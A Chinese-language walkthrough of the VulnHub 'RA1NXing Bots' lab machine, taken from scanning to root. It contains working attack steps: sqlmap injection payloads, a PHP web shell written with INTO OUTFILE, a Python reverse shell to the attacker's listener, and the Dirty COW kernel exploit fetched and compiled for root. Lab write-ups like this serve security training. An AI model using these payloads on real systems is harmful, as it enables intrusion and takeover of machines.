vulhub系列-73-RA1NXing Bots(超详细)

免责声明：本文记录的是 RA1NXing Bots 渗透测试靶机 的解题过程，所有操作均在 本地授权环境 中进行。内容仅供 网络安全学习与防护研究 使用，请勿用于任何非法用途。读者应遵守《网络安全法》及相关法律法规，自觉维护网络空间安全。

环境： https://download.vulnhub.com/botchallenges/RA1NXing_Bots.zip

一、信息收集

1、探测目标IP地址

arp-scan -l #探测当前网段的所有ip地址

┌──(root㉿kali)-[~] └─# arp-scan -l #探测当前网段的所有ip地址dirsearch -u http://192.168.5.11 Interface: eth0, type: EN10MB, MAC: 08:00:27:63:b0:05, IPv4: 192.168.5.5 Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan) 192.168.5.1 0a:00:27:00:00:04 (Unknown: locally administered) 192.168.5.2 08:00:27:38:85:20 PCS Systemtechnik GmbH 192.168.5.14 08:00:27:4b:51:94 PCS Systemtechnik GmbH ​ 4 packets received by filter, 0 packets dropped by kernel Ending arp-scan 1.10.0: 256 hosts scanned in 1.951 seconds (131.21 hosts/sec). 3 responded

nmap -sP 192.168.5.0/24

┌──(root㉿kali)-[~] └─# nmap -sP 192.168.5.0/24 Starting Nmap 7.98 ( https://nmap.org ) at 2026-03-24 05:50 -0400 Nmap scan report for 192.168.5.1 Host is up (0.00013s latency). MAC Address: 0A:00:27:00:00:04 (Unknown) Nmap scan report for 192.168.5.2 Host is up (0.00013s latency). MAC Address: 08:00:27:38:85:20 (Oracle VirtualBox virtual NIC) Nmap scan report for 192.168.5.14 Host is up (0.00019s latency). MAC Address: 08:00:27:4B:51:94 (Oracle VirtualBox virtual NIC) Nmap scan report for 192.168.5.5 Host is up. Nmap done: 256 IP addresses (4 hosts up) scanned in 3.02 seconds

目标IP：192.168.5.14

2、探测目标IP开放端口

nmap -A -T4 -p 1-65535 192.168.5.14

┌──(root㉿kali)-[~] └─# nmap -A -T4 -p 1-65535 192.168.5.14 Starting Nmap 7.98 ( https://nmap.org ) at 2026-03-24 05:51 -0400 Nmap scan report for 192.168.5.14 Host is up (0.00024s latency). Not shown: 65531 closed tcp ports (reset) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 5.5p1 Debian 6+squeeze3 (protocol 2.0) | ssh-hostkey: | 1024 a2:24:9c:39:48:84:7f:da:1f:51:b9:0a:1b:45:df:aa (DSA) |_ 2048 35:f5:0e:fa:c3:6b:98:8a:25:e1:f8:bf:de:38:82:03 (RSA) 80/tcp open http Apache httpd 2.2.16 ((Debian)) |_http-server-header: Apache/2.2.16 (Debian) | http-title: Site doesn't have a title (text/html). |_Requested resource was /index.php?page=main 111/tcp open rpcbind 2-4 (RPC #100000) | rpcinfo: | program version port/proto service | 100000 2,3,4 111/tcp rpcbind | 100000 2,3,4 111/udp rpcbind | 100000 3,4 111/tcp6 rpcbind |_ 100000 3,4 111/udp6 rpcbind 6667/tcp open irc IRCnet ircd MAC Address: 08:00:27:4B:51:94 (Oracle VirtualBox virtual NIC) Device type: general purpose Running: Linux 2.6.X OS CPE: cpe:/o:linux:linux_kernel:2.6.32 OS details: Linux 2.6.32 Network Distance: 1 hop Service Info: Host: irc.localhost; OS: Linux; CPE: cpe:/o:linux:linux_kernel ​ TRACEROUTE HOP RTT ADDRESS 1 0.24 ms 192.168.5.14 ​ OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 19.64 seconds

端口：22、80、111、6667

3、目录探测

dirsearch -u http://192.168.5.14

┌──(root㉿kali)-[~] └─# dirsearch -u http://192.168.5.14 /usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html from pkg_resources import DistributionNotFound, VersionConflict _|. _ _ _ _ _ _|_ v0.4.3 (_||| _) (/_(_|| (_| ) Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460 Output File: /root/reports/http_192.168.5.14/_26-03-24_05-52-16.txt Target: http://192.168.5.14/ [05:52:16] Starting: [05:52:17] 403 - 243B - /.ht_wsr.txt [05:52:17] 403 - 240B - /.htaccess.bak1 [05:52:17] 403 - 240B - /.htaccess.sample [05:52:17] 403 - 240B - /.htaccess.save [05:52:17] 403 - 240B - /.htaccess.orig [05:52:17] 403 - 241B - /.htaccess_extra [05:52:17] 403 - 241B - /.htaccess_orig [05:52:17] 403 - 239B - /.htaccess_sc [05:52:17] 403 - 238B - /.htaccessOLD [05:52:17] 403 - 239B - /.htaccessOLD2 [05:52:17] 403 - 239B - /.htaccessBAK [05:52:17] 403 - 234B - /.htm [05:52:17] 403 - 234B - /.html [05:52:17] 403 - 244B - /.htpasswd_test [05:52:17] 403 - 241B - /.httr-oauth [05:52:17] 403 - 240B - /.htpasswds [05:52:28] 403 - 237B - /cgi-bin/ [05:52:29] 200 - 126B - /contact [05:52:29] 200 - 126B - /contact.php [05:52:37] 200 - 147B - /login [05:52:38] 200 - 115B - /main [05:52:46] 403 - 241B - /server-status/ [05:52:46] 403 - 240B - /server-status Task Completed

二、漏洞利用

1、信息搜集

http://192.168.5.14/index.php

http://192.168.5.14/index.php?page=login

Yakit对这个页面抓包

将请求的内容保存为sql.txt文件。

2、SQLMap

数据库

cat sql.txt # 获取数据库 sqlmap -r sql.txt --batch --dbs --level=3 --risk=2

┌──(root?kali)-[~] └─# cat sql.txt POST /index.php?page=login HTTP/1.1 Host: 192.168.5.14 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Referer: http://192.168.5.14/index.php?page=login Content-Type: application/x-www-form-urlencoded Upgrade-Insecure-Requests: 1 X-Forwarded-For: 127.0.0.1 Accept-Encoding: gzip, deflate Origin: http://192.168.5.14 Content-Length: 17 user=1&password=1 ┌──(root?kali)-[~] └─# sqlmap -r sql.txt --batch --dbs --level=3 --risk=2 ___ __H__ ___ ___[.]_____ ___ ___ {1.9.12#stable} |_ -| . ["] | .'| . | |___|_ [)]_|_|_|__,| _| |_|V... |_| https://sqlmap.org [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program [*] starting @ 06:00:48 /2026-03-24/ [06:00:48] [INFO] parsing HTTP request from 'sql.txt' [06:00:49] [INFO] resuming back-end DBMS 'mysql' [06:00:49] [INFO] testing connection to the target URL sqlmap resumed the following injection point(s) from stored session: --- Parameter: user (POST) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment) Payload: user=1' AND 1612=(SELECT (CASE WHEN (1612=1612) THEN 1612 ELSE (SELECT 5118 UNION SELECT 8882) END))-- -&password=1 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: user=1' AND (SELECT 6488 FROM(SELECT COUNT(*),CONCAT(0x71627a7671,(SELECT (ELT(6488=6488,1))),0x7176767871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- ShQM&password=1 Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: user=1' AND (SELECT 6016 FROM (SELECT(SLEEP(5)))SzKC)-- xgJl&password=1 --- [06:00:49] [INFO] the back-end DBMS is MySQL web server operating system: Linux Debian 6 (squeeze) web application technology: Apache 2.2.16, PHP 5.3.3 back-end DBMS: MySQL >= 5.0 [06:00:49] [INFO] fetching database names [06:00:49] [INFO] resumed: 'information_schema' [06:00:49] [INFO] resumed: 'mysql' [06:00:49] [INFO] resumed: 'user_db' available databases [3]: [*] information_schema [*] mysql [*] user_db [06:00:49] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.5.14' [*] ending @ 06:00:49 /2026-03-24/

注入的出user_db数据库

数据表

sqlmap -r sql.txt --batch -D user_db --tables

┌──(root㉿kali)-[~] └─# sqlmap -r sql.txt --batch -D user_db --tables ___ __H__ ___ ___[(]_____ ___ ___ {1.9.12#stable} |_ -| . ['] | .'| . | |___|_ [(]_|_|_|__,| _| |_|V... |_| https://sqlmap.org [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program [*] starting @ 06:02:17 /2026-03-24/ [06:02:17] [INFO] parsing HTTP request from 'sql.txt' [06:02:17] [INFO] resuming back-end DBMS 'mysql' [06:02:17] [INFO] testing connection to the target URL sqlmap resumed the following injection point(s) from stored session: --- Parameter: user (POST) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment) Payload: user=1' AND 1612=(SELECT (CASE WHEN (1612=1612) THEN 1612 ELSE (SELECT 5118 UNION SELECT 8882) END))-- -&password=1 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: user=1' AND (SELECT 6488 FROM(SELECT COUNT(*),CONCAT(0x71627a7671,(SELECT (ELT(6488=6488,1))),0x7176767871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- ShQM&password=1 Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: user=1' AND (SELECT 6016 FROM (SELECT(SLEEP(5)))SzKC)-- xgJl&password=1 --- [06:02:17] [INFO] the back-end DBMS is MySQL web server operating system: Linux Debian 6 (squeeze) web application technology: PHP 5.3.3, Apache 2.2.16 back-end DBMS: MySQL >= 5.0 [06:02:17] [INFO] fetching tables for database: 'user_db' [06:02:17] [INFO] retrieved: 'users' Database: user_db [1 table] +-------+ | users | +-------+ [06:02:17] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.5.14' [*] ending @ 06:02:17 /2026-03-24/

得到users表

字段

sqlmap -r sql.txt --batch -D user_db -T users --columns

┌──(root㉿kali)-[~] └─# sqlmap -r sql.txt --batch -D user_db -T users --columns ___ __H__ ___ ___[)]_____ ___ ___ {1.9.12#stable} |_ -| . [.] | .'| . | |___|_ ["]_|_|_|__,| _| |_|V... |_| https://sqlmap.org [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program [*] starting @ 06:04:18 /2026-03-24/ [06:04:18] [INFO] parsing HTTP request from 'sql.txt' [06:04:18] [INFO] resuming back-end DBMS 'mysql' [06:04:18] [INFO] testing connection to the target URL sqlmap resumed the following injection point(s) from stored session: --- Parameter: user (POST) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment) Payload: user=1' AND 1612=(SELECT (CASE WHEN (1612=1612) THEN 1612 ELSE (SELECT 5118 UNION SELECT 8882) END))-- -&password=1 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: user=1' AND (SELECT 6488 FROM(SELECT COUNT(*),CONCAT(0x71627a7671,(SELECT (ELT(6488=6488,1))),0x7176767871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- ShQM&password=1 Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: user=1' AND (SELECT 6016 FROM (SELECT(SLEEP(5)))SzKC)-- xgJl&password=1 --- [06:04:18] [INFO] the back-end DBMS is MySQL web server operating system: Linux Debian 6 (squeeze) web application technology: Apache 2.2.16, PHP 5.3.3 back-end DBMS: MySQL >= 5.0 [06:04:18] [INFO] fetching columns for table 'users' in database 'user_db' [06:04:18] [INFO] retrieved: 'user' [06:04:18] [INFO] retrieved: 'varchar(256)' [06:04:18] [INFO] retrieved: 'pass' [06:04:18] [INFO] retrieved: 'varchar(256)' Database: user_db Table: users [2 columns] +--------+--------------+ | Column | Type | +--------+--------------+ | user | varchar(256) | | pass | varchar(256) | +--------+--------------+ [06:04:18] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.5.14' [*] ending @ 06:04:18 /2026-03-24/

获取字段值

sqlmap -r sql.txt --batch -D user_db -T users --dump

┌──(root㉿kali)-[~] └─# sqlmap -r sql.txt --batch -D user_db -T users --dump ___ __H__ ___ ___[,]_____ ___ ___ {1.9.12#stable} |_ -| . ['] | .'| . | |___|_ [)]_|_|_|__,| _| |_|V... |_| https://sqlmap.org [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program [*] starting @ 06:04:58 /2026-03-24/ [06:04:58] [INFO] parsing HTTP request from 'sql.txt' [06:04:58] [INFO] resuming back-end DBMS 'mysql' [06:04:58] [INFO] testing connection to the target URL sqlmap resumed the following injection point(s) from stored session: --- Parameter: user (POST) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment) Payload: user=1' AND 1612=(SELECT (CASE WHEN (1612=1612) THEN 1612 ELSE (SELECT 5118 UNION SELECT 8882) END))-- -&password=1 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: user=1' AND (SELECT 6488 FROM(SELECT COUNT(*),CONCAT(0x71627a7671,(SELECT (ELT(6488=6488,1))),0x7176767871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- ShQM&password=1 Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: user=1' AND (SELECT 6016 FROM (SELECT(SLEEP(5)))SzKC)-- xgJl&password=1 --- [06:04:58] [INFO] the back-end DBMS is MySQL web server operating system: Linux Debian 6 (squeeze) web application technology: Apache 2.2.16, PHP 5.3.3 back-end DBMS: MySQL >= 5.0 [06:04:58] [INFO] fetching columns for table 'users' in database 'user_db' [06:04:58] [INFO] resumed: 'user' [06:04:58] [INFO] resumed: 'varchar(256)' [06:04:58] [INFO] resumed: 'pass' [06:04:58] [INFO] resumed: 'varchar(256)' [06:04:58] [INFO] fetching entries for table 'users' in database 'user_db' [06:04:58] [INFO] retrieved: 'root' [06:04:58] [INFO] retrieved: 'totally not helpful password' Database: user_db Table: users [1 entry] +------------------------------+--------+ | pass | user | +------------------------------+--------+ | totally not helpful password | root | +------------------------------+--------+ [06:04:58] [INFO] table 'user_db.users' dumped to CSV file '/root/.local/share/sqlmap/output/192.168.5.14/dump/user_db/users.csv' [06:04:58] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.5.14' [*] ending @ 06:04:58 /2026-03-24/

综合结果如下：

root/totally not helpful password

3、SQL命令注入

sqlmap -r sql.txt --batch --file-read="/var/www/index.php"

┌──(root㉿kali)-[~] └─# sqlmap -r sql.txt --batch --file-read="/var/www/index.php" ___ __H__ ___ ___[.]_____ ___ ___ {1.9.12#stable} |_ -| . [.] | .'| . | |___|_ [']_|_|_|__,| _| |_|V... |_| https://sqlmap.org [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program [*] starting @ 06:06:00 /2026-03-24/ [06:06:00] [INFO] parsing HTTP request from 'sql.txt' [06:06:00] [INFO] resuming back-end DBMS 'mysql' [06:06:00] [INFO] testing connection to the target URL sqlmap resumed the following injection point(s) from stored session: --- Parameter: user (POST) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment) Payload: user=1' AND 1612=(SELECT (CASE WHEN (1612=1612) THEN 1612 ELSE (SELECT 5118 UNION SELECT 8882) END))-- -&password=1 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: user=1' AND (SELECT 6488 FROM(SELECT COUNT(*),CONCAT(0x71627a7671,(SELECT (ELT(6488=6488,1))),0x7176767871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- ShQM&password=1 Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: user=1' AND (SELECT 6016 FROM (SELECT(SLEEP(5)))SzKC)-- xgJl&password=1 --- [06:06:00] [INFO] the back-end DBMS is MySQL web server operating system: Linux Debian 6 (squeeze) web application technology: PHP 5.3.3, Apache 2.2.16 back-end DBMS: MySQL >= 5.0 [06:06:00] [INFO] fingerprinting the back-end DBMS operating system [06:06:00] [INFO] the back-end DBMS operating system is Linux [06:06:00] [INFO] fetching file: '/var/www/index.php' <?php if(!isset($_GET['page'])) { header("Location: /index.php?page=main"); exit(); } ?> <html> <head> </head> <body> <a href="/index.php?page=main">Main</a><br/> <a href="/index.php?page=login">Login</a><br/> <a href="/index.php?page=contact.php">Contact Us</a><br/> <?php $page = basename($_GET['page']); print(file_get_contents($page)); ?> <?php if(isset($_POST['user']) && isset($_POST['password'])) { $user = $_POST['user']; $pass = $_POST['password']; $link = mysql_connect("localhost", "root", "some bad pass"); mysql_select_db("user_db"); $query = "SELECT * FROM users WHERE user='".$user."' AND pass='$pass'"; $result = mysql_query($query) or die(mysql_error()); if(mysql_num_rows($result) === 1) { print("YOU LOGGED IN!<br/>"); } mysql_close($link); } ?> </b do you want confirmation that the remote file '/var/www/index.php' has been successfully downloaded from the back-end DBMS file system? [Y/n] Y [06:06:00] [INFO] retrieved: '796' [06:06:00] [INFO] the local file '/root/.local/share/sqlmap/output/192.168.5.14/files/_var_www_index.php' and the remote file '/var/www/index.php' have the same size (796 B) files saved to [1]: [*] /root/.local/share/sqlmap/output/192.168.5.14/files/_var_www_index.php (same file) [06:06:00] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.5.14' [*] ending @ 06:06:00 /2026-03-24/

主页Yakit抓包，添加后门

user=1' union select '<?php system($_GET["cmd"]); ?>', '' into outfile '/var/www/bd.php'#&password=1

验证后门：

http://192.168.5.14/bd.php/?cmd=whoami

4、反弹shell

浏览器：

http://192.168.5.14/bd.php/?cmd=python%20-c%20%22import%20os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%27192.168.5.5%27,4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call([%27/bin/sh%27,%27-i%27]);%22

kali：

nc -lvnp 4444

反弹成功：

┌──(root?kali)-[~] └─# nc -lvnp 4444 listening on [any] 4444 ... connect to [192.168.5.5] from (UNKNOWN) [192.168.5.14] 39244 /bin/sh: can't access tty; job control turned off $

三、权限提升

1、切换bash下shell

python -c 'import pty; pty.spawn("/bin/bash")'

$ python -c 'import pty; pty.spawn("/bin/bash")' www-data@IRCC2:/var/www$ www-data@IRCC2:/var/www$

2、查看当前账户是否存在可以使用的特权命令

www-data@IRCC2:/home/legit$ sudo -l sudo -l bash: sudo: command not found www-data@IRCC2:/home/legit$

3、检查内核版本

uname -a

www-data@IRCC2:/home/legit$ uname -a uname -a Linux IRCC2 2.6.32-5-686 #1 SMP Fri May 10 08:33:48 UTC 2013 i686 GNU/Linux www-data@IRCC2:/home/legit$

4、内核漏洞提权 (Kernel Exploit)

kali：

wget https://raw.githubusercontent.com/firefart/dirtycow/master/dirty.c python -m http.server 80

┌──(root㉿kali)-[~] └─# wget https://raw.githubusercontent.com/firefart/dirtycow/master/dirty.c --2026-03-24 06:18:39-- https://raw.githubusercontent.com/firefart/dirtycow/master/dirty.c 正在解析主机 raw.githubusercontent.com (raw.githubusercontent.com)... 185.199.108.133, 185.199.111.133, 185.199.110.133, ... 正在连接 raw.githubusercontent.com (raw.githubusercontent.com)|185.199.108.133|:443... 已连接。 已发出 HTTP 请求，正在等待回应... 200 OK 长度：4795 (4.7K) [text/plain] 正在保存至: “dirty.c” dirty.c 100%[============================>] 4.68K --.-KB/s 用时 0s 2026-03-24 06:18:54 (74.4 MB/s) - 已保存 “dirty.c” [4795/4795]) ┌──(root㉿kali)-[~] └─# ls 3.jpg dirty.c lxd-alpine-builder reports sql.txt steganopayload148505.txt wordlist.txt ┌──(root㉿kali)-[~] └─# python -m http.server 80 Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...

目标靶机：

cd /tmp wget http://192.168.5.5/dirty.c gcc -pthread dirty.c -o dirty -lcrypt chmod +x dirty ./dirty

www-data@IRCC2:/home/legit$ cd /tmp cd /tmp www-data@IRCC2:/tmp$ www-data@IRCC2:/tmp$ wget http://192.168.5.5/dirty.c wget http://192.168.5.5/dirty.c --2026-03-24 06:21:02-- http://192.168.5.5/dirty.c Connecting to 192.168.5.5:80... connected. HTTP request sent, awaiting response... 200 OK Length: 4795 (4.7K) [text/x-csrc] Saving to: `dirty.c' 100%[======================================>] 4,795 --.-K/s in 0s 2026-03-24 06:21:02 (469 MB/s) - `dirty.c' saved [4795/4795] www-data@IRCC2:/tmp$ www-data@IRCC2:/tmp$ gcc dirty.c -o dirty -pthread gcc dirty.c -o dirty -pthread /tmp/ccZiwsv1.o: In function `generate_password_hash': dirty.c:(.text+0x16): undefined reference to `crypt' collect2: ld returned 1 exit status www-data@IRCC2:/tmp$ www-data@IRCC2:/tmp$ ls ls dirty.c www-data@IRCC2:/tmp$ www-data@IRCC2:/tmp$ gcc -pthread dirty.c -o dirty -lcrypt gcc -pthread dirty.c -o dirty -lcrypt www-data@IRCC2:/tmp$ www-data@IRCC2:/tmp$ ls ls dirty dirty.c www-data@IRCC2:/tmp$ www-data@IRCC2:/tmp$ chmod +x dirty chmod +x dirty www-data@IRCC2:/tmp$ www-data@IRCC2:/tmp$ ./dirty ./dirty /etc/passwd successfully backed up to /tmp/passwd.bak Please enter the new password: 123456 Complete line: toor:toKbqrb/U79xA:0:0:pwned:/root:/bin/bash mmap: b76e4000

执行完成后得到用户和密码：toor/123456，将反弹shell断开后重新连接，使用新用户toor和密码登录，获取root权限。

su toor 密码：123456 id

www-data@IRCC2:/var/www$ su toor su toor Password: 123456 ​ toor@IRCC2:/var/www# ​ toor@IRCC2:/var/www# id id uid=0(toor) gid=0(root) groups=0(root) toor@IRCC2:/var/www# ​ toor@IRCC2:/var/www# cd /root cd /root toor@IRCC2:~# ​ toor@IRCC2:~# ls ls decoded.php toor@IRCC2:~# ​ toor@IRCC2:~# whoami whoami toor toor@IRCC2:~# ​ toor@IRCC2:~# ​

本文涉及的技术方法仅适用于 授权测试环境 或 合法 CTF 赛事。请勿在未授权的情况下对任何系统进行测试。安全之路，始于合规，终于责任。